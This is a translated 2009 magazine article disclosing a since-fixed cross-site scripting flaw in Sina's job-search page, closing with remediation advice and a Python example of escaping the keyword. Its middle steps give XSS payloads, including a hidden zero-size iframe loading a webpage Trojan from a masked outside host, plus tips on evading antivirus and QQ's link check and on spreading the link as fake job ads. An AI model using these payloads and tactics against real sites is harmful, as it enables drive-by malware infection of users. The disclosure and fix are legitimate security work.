Secrets of Sina recruitment (cross-site scripting attacks)

Author: Miao Diyu

Subject of this issue: Sina recruitment

Problem: lax keyword filtering, cross-site scripting attack

Main hazard: webpage Trojan attacks

Survey time: 2009.6.24 ~ 2009.6.26

Vulnerability status: fixed after notification

As one of the top portals in China, Sina has always been a target for many hackers. Recently, the hacker column of the Computer Newspaper uncovered a secret about Sina that could not be disclosed to others: Sina recruitment has a cross-site scripting vulnerability that can be used to plant a webpage Trojan.


With the current economic downturn, jobs are hard to find, and the saying that graduation equals unemployment can be seen everywhere online. Countless people will fight for any good job, and a job at Sina is undoubtedly a good one, so there are countless people submitting applications. "Sina recruitment" is a sub-site dedicated to talent recruitment by Sina (figure 1).



However, because the site does not filter the search keywords submitted by users, a cross-site scripting vulnerability exists. Hackers can construct special script code that writes Trojan code directly into the webpage, and a user only needs to click the link to trigger the webpage Trojan. If this editor had not notified Sina to fix the vulnerability in time, how many people would have been infected had the vulnerability been used to plant Trojans?


Lax keyword filtering

The "Sina recruitment" homepage provides a job search function. You can directly enter a keyword for the job you want to search for. For example, if you enter "edit" and click the "Start search" button, you quickly get the search results, and the results page URL is as follows: http://career.sina.com.cn/job_list.php?area=&type=&ptype=&datearea=&keyword=%B1%E0%BC%AD. Here "%B1%E0%BC%AD" is the URL-encoded form of "edit".

It can be seen that the "keyword" parameter carries the search keyword. Many websites do not filter dangerous characters when they use such parameters in queries. Would Sina also make such a low-level mistake? Replace the keyword "%B1%E0%BC%AD" with "<script>alert(test)</script>". After you press Enter, a dialog box is displayed with the content "test" (figure 2), which proves that Sina recruitment does have a cross-site scripting vulnerability. The steps that follow show how frightening this vulnerability can be.

Sina recruitment Trojan Road Show

Change the value of the keyword parameter to <iframe src="http://www.baidu.com" width=900 height=1200></iframe>, press Enter, and we can see the Baidu search box at the bottom of the "Sina recruitment" homepage (figure 3). This shows that we have successfully inserted Baidu into the homepage of "Sina recruitment". If we change the Baidu address to the address of a webpage Trojan......


Step 1: create a webpage Trojan

To mount a Trojan on "Sina recruitment", you must first configure a webpage Trojan. Ordinary users pay attention to patching Windows system vulnerabilities but tend to ignore patching third-party software, so exploiting such vulnerabilities has a high success rate. Here the Storm Player (audio/video software) vulnerability is chosen.

Then we need to prepare some web space (free space on the network will do) and upload the configured Trojan server to it. It is advisable to make the Trojan undetectable to antivirus software beforehand, which improves its self-protection. The prepared webpage and webpage Trojan are shown in figure 4.


Step 2: Construct a trojan URL

After creating the webpage Trojan and uploading it to the web space, we construct the Trojan URL by replacing the keyword with the Trojan code. The complete URL after replacement is as follows: http://career.sina.com.cn/job_list.php?area=&type=&ptype=%CA%D0%B3%A1%D3%AA%CF%FA%C0%E0&datearea=&keyword=<iframe src="http://www.***.com/bf.htm" width=0 height=0></iframe>.

The "width" and "height" attributes are set to 0 so that the webpage Trojan opens silently instead of displaying a visible page as it did in the Baidu test, which greatly improves the concealment of the Trojan. Now, all that remains is to get other people to visit this URL.


Step 3: Spread the trojan URL

Because "Sina recruitment" is being used to carry the Trojan, the URL begins with career.sina.com.cn and the Trojan code appears only at the end. Software with URL security checking therefore treats it as a Sina URL and lets it through.

Let's do a test. Copy the Trojan URL http://career.sina.com.cn/job_list.php?area=&type=&ptype=%CA%D0%B3%A1%D3%AA%CF%FA%C0%E0&datearea=&keyword=<iframe%20src="http://www.***.com/bf.htm"%20width=0%20height=0></iframe> into a QQ chat window and send it to the other party. The result: QQ's URL check shows a green flag, meaning the URL is considered normal (figure 5).

In addition, hackers can post Trojan URLs disguised as recruitment information in high-traffic places such as forums, chat rooms, and blogs. If hackers do this, the consequences are unimaginable.

Security tip: before sending a Trojan URL, replace the spaces in the URL with %20; otherwise the hyperlink may be cut short when sent.


Vulnerability Solution

To close this vulnerability, the Sina recruitment site must strictly filter keywords so that script code cannot be entered into the site, let alone executed. Ordinary users should keep the real-time monitoring of their antivirus software enabled while browsing, and ideally use a security tool with a webpage Trojan interception function.

Carefully examine URLs sent by others. If a URL contains sensitive content such as iframe or script, or is obfuscated by encoding, do not click it: a large Trojan plot is very likely hidden behind it.
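The server-side fix the article calls for is to stop the keyword from being reflected into the results page as live markup. As an added example, not the site's own PHP code, the following shows a minimal "before" rendering that copies the GBK-encoded keyword into the page verbatim beside a "after" rendering that HTML-escapes it for both the attribute and the text context; the query strings are constructed for this example.

```python
from html import escape
from urllib.parse import parse_qs


def get_keyword(query_string: str) -> str:
    """Extract the 'keyword' parameter; the page's charset is GBK, as in the article."""
    params = parse_qs(query_string, keep_blank_values=True,
                      encoding="gbk", errors="replace")
    return params.get("keyword", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Before: the keyword is interpolated raw, so <script> or <iframe> in it becomes live HTML,
    and a double quote in it breaks out of the input's value attribute."""
    keyword = get_keyword(query_string)
    return (f'<input name="keyword" value="{keyword}">'
            f"<p>Results for: {keyword}</p>")


def render_fixed(query_string: str) -> str:
    """After: the keyword is HTML-escaped (quote=True also escapes " and ') before it is
    placed in either context, so the browser treats it as text, never as markup."""
    keyword = escape(get_keyword(query_string), quote=True)
    return (f'<input name="keyword" value="{keyword}">'
            f"<p>Results for: {keyword}</p>")


# Constructed query strings: the article's alert payload and the benign GBK keyword "edit".
XSS_QUERY = "area=&type=&ptype=&datearea=&keyword=%3Cscript%3Ealert(test)%3C/script%3E"
BENIGN_QUERY = "area=&type=&ptype=&datearea=&keyword=%B1%E0%BC%AD"

if __name__ == "__main__":
    print(render_vulnerable(XSS_QUERY))
    print(render_fixed(XSS_QUERY))
    print(render_fixed(BENIGN_QUERY))
```

Escaping on output is the durable fix; a blacklist of the words "script" and "iframe" would also reject legitimate searches for those job titles.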
